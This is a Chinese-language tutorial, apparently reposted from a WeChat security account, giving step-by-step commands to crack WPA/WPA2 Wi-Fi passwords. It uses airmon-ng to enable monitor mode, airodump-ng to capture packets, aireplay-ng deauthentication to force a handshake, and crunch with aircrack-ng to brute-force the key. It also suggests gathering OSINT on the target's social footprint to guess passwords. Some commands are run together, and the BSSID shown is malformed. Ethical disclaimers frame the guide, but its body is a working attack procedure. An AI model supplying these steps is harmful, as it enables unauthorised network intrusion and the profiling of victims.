介绍

Wi-Fi 安全是数字隐私的一个重要方面，了解如何利用漏洞对于网络管理员和网络安全爱好者来说至关重要。在本教程中，我们将探索使用 Kali Linux 上的 Aircrack-ng 破解受 WPA-WPA2 保护的 Wi-Fi 网络的过程，以用于教育目的。

所需工具

在深入了解该过程之前，请确保您拥有以下工具：

• 支持监控模式的网络适配器（例如，TL-WN722N V2） 。

• 您的机器上安装了 Kali Linux。

• Aircrack-ng

• Airodump-ng

• Airmon-ng

• Crunch

监控模式设置

步骤 1：终止中断服务

• 在启用监控模式之前，识别并终止可能中断该过程的服务：

sudo airmon-ng check wlan0sudo airmon-ng check kill

步骤 2：启用监控模式

• 停止 WLAN 接口并启用监控模式：

ifconfig wlan0 downiwconfig wlan0 mode monitorifconfig wlan0 up

• 使用以下方法验证模式：

iwconfig

‍

数据包捕获和四次握手

步骤 3：捕获 BSSID 并监控网络

• 用于airodump-ng捕获 BSSID 信息：

airodump-ng wlan0

• 选择特定的 BSSID 进行监控并运行：

airodump-ng -c 1 -w Scan_network --bssid EW :WV : 4 H: J7 :A5 : 28 wlan0

• 在后台运行上述命令。

步骤 4：取消认证过程

• 取消目标 Wi-Fi 的认证以捕获四次握手：

sudo aireplay-ng - 0  0 -a EW :WV : 4 H: J7 :A5 : 28 wlan0

• 运行命令，直到在后台代码中看到四次握手。

最后阶段：使用 Crunch 和 Aircrack-ng 破解密码

• 捕获四次握手后，最后一步是使用Crunch和破解 Wi-Fi 密码aircrack-ng。需要注意的是，此过程的成功在很大程度上取决于各种因素，包括密码的复杂性和长度。

使用 Crunch 生成密码

• 在此示例中，我用来Crunch生成可能的密码。由于我知道 Wi-Fi 密码仅由数字字符组成，因此命令进行了相应调整：

sudo crunch 8 8 123456780 | aircrack-ng -w - Scan_Kamalesh-01.cap -e KamaleshD

笔记：

根据您对密码的了解修改crunch命令，例如调整长度或字符集。

密码长度和 OSINT

如果您不知道密码，尝试通过测试所有可能的组合来破解密码将是一个极其耗时的过程。可能性的数量可能达到数十亿，因此在合理的时间内在标准 PC 上破解密码几乎是不可能的。

在这种情况下，请考虑利用开源情报 (OSINT) 技术。分析社交足迹，收集有关目标偏好的信息，并尝试确定密码的可能长度和复杂性。这种方法可以显著减少搜索空间并增加成功猜测密码的机会。

请记住，道德黑客涉及负责任和合法地使用知识。在从事网络安全活动时，始终尊重隐私并遵守道德标准。

结论

道德黑客攻击涉及了解漏洞以增强安全措施。本指南旨在提供有关 Wi-Fi 安全性的见解，强调负责任和合法地使用知识。在探索网络安全时，始终尊重隐私并遵守道德标准。

原文始发于微信公众号（Rsec）：0016. WPA-WPA2 Wi-Fi 黑客攻击：分步指南【转载】